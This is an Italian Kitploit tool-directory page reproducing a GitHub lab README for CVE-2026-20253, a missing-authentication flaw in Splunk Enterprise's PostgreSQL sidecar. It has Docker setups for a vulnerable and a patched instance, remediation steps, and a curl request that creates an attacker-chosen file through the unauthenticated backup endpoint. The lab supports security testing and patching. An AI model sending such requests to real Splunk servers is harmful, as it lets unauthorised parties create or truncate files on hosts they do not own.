Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20253 — POC per CVE-2026-20253 | Kitploit
Strumenti/GitHubGitHub/pssec-io/cve-2026-20253
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

POC per CVE-2026-20253

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20253 — Laboratorio di RCE pre-autenticazione su Splunk Enterprise

Creazione e Troncatura Arbitraria di File non Autenticata tramite Sidecar PostgreSQL
CVSS 9.8 · Critico · CWE-306 · Sfruttato attivamente (CISA KEV)


⚠️ Disclaimer

Questo repository è inteso strettamente per scopi educativi e di ricerca sulla sicurezza autorizzati.
Tutti i test devono essere eseguiti su infrastrutture di tua proprietà o per le quali hai esplicita autorizzazione scritta.
Gli autori non si assumono alcuna responsabilità per l'uso improprio delle tecniche o degli strumenti qui dimostrati.
Non eseguire mai questo software su sistemi di produzione o ambienti che non possiedi.


Panoramica

CVE-2026-20253 interessa Splunk Enterprise versioni precedenti a 10.2.4 e 10.0.7.
Il servizio sidecar PostgreSQL incluso in Splunk espone due endpoint HTTP interni:

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

Entrambi gli endpoint non hanno alcun controllo di autenticazione (CWE-306), il che significa che qualsiasi attaccante raggiungibile in rete può invocarli senza credenziali. Fornendo un parametro backupFile controllato dall'attaccante, un utente non autenticato può creare o troncare file arbitrari sul filesystem host di Splunk — una primitiva che i ricercatori hanno concatenato in una Remote Code Execution (esecuzione di codice remoto) pre-autenticazione completa.


Struttura del repository

root@kitploit:~
.
├── Dockerfile                  # Vulnerable image  (splunk 10.2.3)
├── docker-compose.yml          # Vulnerable container on port 8000
├── patched.Dockerfile          # Patched image     (splunk 10.2.4)
├── patched-docker-compose.yml  # Patched container on port 8001
└── instructions                # Quick command reference

Prerequisiti

  • Docker + Docker Compose v2
  • ~6 GB di spazio libero su disco (l'immagine Splunk è grande)
  • Kali Linux o qualsiasi host Linux con curl disponibile

Utilizzo

Avvia l'istanza vulnerabile (porta 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

Attendi circa 90 secondi per l'inizializzazione completa di Splunk. Segui i progressi con:

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"

Interfaccia Web Splunk → http://localhost:8000
Credenziali: admin / changeme


Avvia l'istanza patchata (porta 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

Interfaccia Web Splunk → http://localhost:8001
Credenziali: admin / changeme

Entrambi i contenitori possono funzionare affiancati — le porte sono sfalsate per evitare conflitti.


Test

Test istanza vulnerabile → si prevede HTTP 400

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Previsto: 400 — l'endpoint esiste, nessuna autenticazione è stata imposta, la richiesta è stata elaborata.

Verifica che il file sia stato creato all'interno del contenitore:

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

Test istanza patchata → si prevede HTTP 401

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Previsto: 401 — l'autenticazione ora è imposta, richiesta rifiutata.


Riferimento codici di risposta

Stato HTTP

Opzionale: scanner watchTowr

Il team di watchTowr Labs ha pubblicato uno script di rilevamento che automatizza il controllo sopra indicato:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

Arrestare il laboratorio

root@kitploit:~
# Stop vulnerable
docker compose -f docker-compose.yml down

# Stop patched
docker compose -f patched-docker-compose.yml down

Rimedio

Aggiorna immediatamente a una versione corretta:

RamoVersione corretta
10.2.x10.2.4
10.0.x10.0.7

Se non puoi applicare la patch immediatamente, disabilita il sidecar PostgreSQL aggiungendo quanto segue a server.conf e riavvia Splunk:

root@kitploit:~
[postgres]
disabled = true

⚠️ Non disabilitare il sidecar se stai eseguendo Edge Processor o pipeline dati SPL2 — è necessario per quelle funzionalità.


Riferimenti

  • 🔴 Avviso ufficiale Splunk — SVD-2026-0603
  • 🔬 Ricerca e strumento di rilevamento watchTowr Labs — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 Voce CISA KEV — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 Articolo di The Hacker News — Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication

Legale

Questo ambiente di laboratorio è fornito esclusivamente per la ricerca sulla sicurezza difensiva e per scopi educativi.
L'accesso non autorizzato ai sistemi informatici è illegale ai sensi del Computer Fraud and Abuse Act (CFAA), del UK Computer Misuse Act e della legislazione equivalente in tutto il mondo.
Utilizza responsabilmente.

Scarica lo strumento
ProprietàDettaglio
CVECVE-2026-20253
Punteggio CVSS9.8 (Critico)
CWECWE-306 — Mancanza di autenticazione per funzioni critiche
Versioni affetteSplunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
Patch in10.0.7, 10.2.4
CISA KEVAggiunto il 18 giugno 2026
Significato
400Vulnerabile — endpoint colpito, nessun controllo di autenticazione
401Patchato — autenticazione imposta
404Sidecar non presente / percorso errato
000Contenitore non ancora pronto